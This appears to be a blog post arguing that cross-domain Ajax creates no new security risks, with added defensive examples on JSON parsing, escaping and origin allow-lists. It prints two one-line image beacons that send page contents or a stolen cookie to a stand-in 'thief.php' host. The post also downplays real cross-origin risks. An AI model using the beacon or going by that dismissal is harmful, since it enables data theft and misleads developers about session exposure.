Debunking Strong Misconceptions About Cross-Domain Ajax Security Issues
Quite a number of people have been discussing possible cross-domain Ajax security issues recently. These are smart people who generally know their technologies very well, but for some reason they are missing some fundamental aspects of Ajax. Here are a few of the articles I am referring to.
- Cross Domain XHR
- Ajax: Is talking to outside domains safe?
- Cross-Domain Ajax. Security Implications in Depth
To recap the issues mentioned in these articles.
- Resource Theft: Does allowing cross-domain Ajax enable theft of resources from intranets and the like?
- Cross Site Scripting: Does allowing cross-domain Ajax enable new cross site scripting attacks?
- Slow 3rd Party Web Sites: What if your server is in the US, the client is in the US, and the remote service is in India?
- Slowing down other people's sites: What if you use many Ajax calls to try to shut down another person's site?
- Session data: If the client can hold session data, then we may be able to open up requests to outside domains, but we would have to somehow secure this new data transfer, or we will see bigger holes for people to attack.
- If you allow cross-site Ajax, can a malicious web page perform actions as if you are logged in at that site?
- What about trusted domains? Wouldn't it be great to be able to say "mydomain.com trusts yourdomain.com and hisdomain.com" similar to Flash's crossdomain.xml policy file.
I will talk about each of these issues in turn, but the core of every point stems from the same thing. Ajax grabs text data from a server the way an image tag grabs image data from a server. Ajax inherently does not execute any of the text it receives. In fact, as the latest Windows image rendering overflow shows, it can actually be a bigger security risk to show a malicious image on a web page than it would ever be to grab text with Ajax.
(new Image()).src = "http://remotesite.com/thief.php?data=" + encodeURIComponent(document.body.innerHTML);
Cross Site Scripting
This is the funniest of all security concerns about Ajax, since, as mentioned many times already, unless you call eval yourself (in which case I hope you are prepared for the results; that has nothing to do with Ajax) Ajax is as innocuous as putting an image from a remote site on your site. No remote scripts are executed by default in Ajax.
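To make the point above concrete, here is an added example (not code from the original post) of the two ways response text stays inert: parse it as JSON instead of evaluating it, and escape it before it is placed into markup, which is what assigning to textContent rather than innerHTML achieves in the browser. The sample responses and the expected `message` field are constructed for the example.

```javascript
// Added example, not from the original post. The text an XHR hands back is only
// data; what the page does with it decides whether a hostile remote site gets
// to run code. The expected response shape ({"message": "..."}) is assumed.

// JSON.parse evaluates nothing: a body like "alert(document.cookie)" is simply
// a syntax error, where eval would have executed it.
function parseJsonResponse(text) {
  let value;
  try {
    value = JSON.parse(text);
  } catch (e) {
    return { ok: false, error: "not JSON" };
  }
  // Shape check: the caller expects a plain object with a string `message`.
  if (value === null || typeof value !== "object" || Array.isArray(value) ||
      typeof value.message !== "string") {
    return { ok: false, error: "unexpected shape" };
  }
  return { ok: true, message: value.message };
}

// Escape text so it lands in HTML as literal characters (the same effect as
// element.textContent = text instead of element.innerHTML = text).
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Constructed sample responses, the kind any remote server could return.
const SAMPLE_RESPONSES = [
  '{"message": "hello from remote"}',
  '{"message": "<script>alert(1)</script>"}',
  "alert(document.cookie)",
];

// Render each response into a paragraph; nothing in the response is executed
// or interpreted as markup.
function renderAll(responses) {
  return responses.map((text) => {
    const parsed = parseJsonResponse(text);
    return parsed.ok
      ? `<p>${escapeHtml(parsed.message)}</p>`
      : `<p>(rejected: ${parsed.error})</p>`;
  });
}

// Usage: renderAll(SAMPLE_RESPONSES) yields three <p> strings, the second with
// its angle brackets escaped and the third rejected as not JSON.
```

The shape check matters as much as the parser choice: code that trusts `value.message` to be a string without looking will happily pass an object or array further along, and the escaping step only protects the HTML context, not an attribute like `href` or a script block.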
Slow 3rd Party Web Sites
If you are requesting text from Russia it might take the page longer to load. If you are requesting an image from Russia it might take the page longer to load. No difference. The name of the game is embedding remote resources wisely, not banning a very useful technology because it can be used in a dumb way.
Slowing down other people's sites
Again, this is just as easy without cross-domain Ajax as it is with cross-domain Ajax. You could just as easily create dynamic iframes, images, and scripts to accomplish the same end and there are no restrictions in place to stop that family of attacks.
This actually falls into the same category as resource theft. Cross-domain Ajax does not introduce any new security issue that you cannot already exploit today.
Performing actions as if you are logged in
Cookies are protected against cross-domain access, and cross-domain Ajax would not circumvent that at all. A malicious site accessing your site would not have access to your cookies no matter how hard it tried; cross-domain Ajax would not change that. One might ask: well, what if somehow the cookie is hijacked? Doesn't Ajax make it easier to send? No, no it does not.
(new Image()).src = "http://remotesite.com/thief.php?data=" + encodeURIComponent(hijacked_cookie);
Some people think that one should require explicit permission to have cross-domain Ajax access to sites. I ask those people why? I don't need permission to curl your site. I don't need permission to embed images from your site into mine. I don't need permission to include scripts from your site. I don't need permission to include iframes that link to your site. Why should I need permission to grab text data from your website from within my site?
If there are any more concerns about cross-domain Ajax that I am missing, please comment. At this moment I can see nothing that makes a difference to security by allowing cross-domain Ajax. Safari already allows cross-domain Ajax (thank you Apple!). I cannot wait for the IE and Firefox people to figure out that their fears are baseless.
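The "mydomain.com trusts yourdomain.com and hisdomain.com" policy from the recap list, and the permission question just above, can be expressed in code. The following is an added example, not code from the original post or from any browser vendor: it shows the server side of a trusted-domain list in the form browsers later standardized, where the browser sends the caller's origin in an Origin header and only exposes the response to the calling page if the server answers with a matching Access-Control-Allow-Origin header. The domain names and the request-header object are constructed for the example.

```javascript
// Added example, not from the original post. Server-side evaluation of a
// trusted-domain list against the Origin header a browser sends with a
// cross-domain XHR. Domain names are assumed values.
const TRUSTED_ORIGINS = new Set([
  "https://yourdomain.com",
  "https://hisdomain.com",
]);

// Turn an Origin header value into a canonical scheme://host[:port] string, or
// null if it is absent, the literal "null" (sent for opaque origins), or not a
// bare origin. The URL parser lowercases the host for us.
function canonicalOrigin(value) {
  if (typeof value !== "string" || value === "null") return null;
  try {
    const u = new URL(value);
    if (u.pathname !== "/" || u.search || u.hash || u.username) return null;
    return u.origin;
  } catch (e) {
    return null;
  }
}

// Exact match only. A suffix or substring test would also accept
// "https://yourdomain.com.evil.example" or "https://evilyourdomain.com",
// and the scheme is part of the match, so plain http is not the same origin.
function isTrusted(origin) {
  return origin !== null && TRUSTED_ORIGINS.has(origin);
}

// Response headers to attach, or null when the caller is not trusted. With
// null the browser still lets the request reach the server but withholds the
// response body from the calling page.
function corsHeadersFor(requestHeaders) {
  const origin = canonicalOrigin(requestHeaders.origin);
  if (!isTrusted(origin)) return null;
  return {
    // Echo the single trusted origin; "*" is not accepted by browsers when
    // cookies are included, and would also advertise the data to everyone.
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    // Shared caches must not serve one origin's answer to a different origin.
    "Vary": "Origin",
  };
}

// Usage: corsHeadersFor({ origin: "https://yourdomain.com" }) returns the three
// headers; corsHeadersFor({ origin: "https://yourdomain.com.evil.example" })
// returns null.
```

The pattern is the opposite of the post's "no permission needed" stance only in one respect: the server, not the calling page, decides which origins may read its responses, which is what keeps an intranet page's content from being read by an outside site that a browser inside the intranet happens to visit.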
IMPORTANT UPDATE: A Real Concern is Found
Patrick Breitenbach was able to find one single security implication, but it only works if all of the following conditions are satisfied:
- POSTs are required (note that unfortunately the vast majority of web applications don't care one way or the other)
- the attacker knows, at the very least, the intranet URL
- the attacker gets someone inside the intranet to visit that malicious site that targets their particular intranet software
- the intranet has no form of internal authentication
- the intranet does not check referrers to make sure that the POST comes from a form inside the intranet
If all of those are true, the attacker could have access to slightly more information on the intranet than he could have right now. There are a lot of conditions for this exploit, but the gist of it is that you have to have crappy intranet software targeted directly by people with intimate knowledge of your particular intranet system in order for this to make any difference.
Compared to the amazing possible gains of enabling cross-domain Ajax, this seems like way too small of a concern to make a difference. Is this really the only thing holding Firefox and IE from allowing it?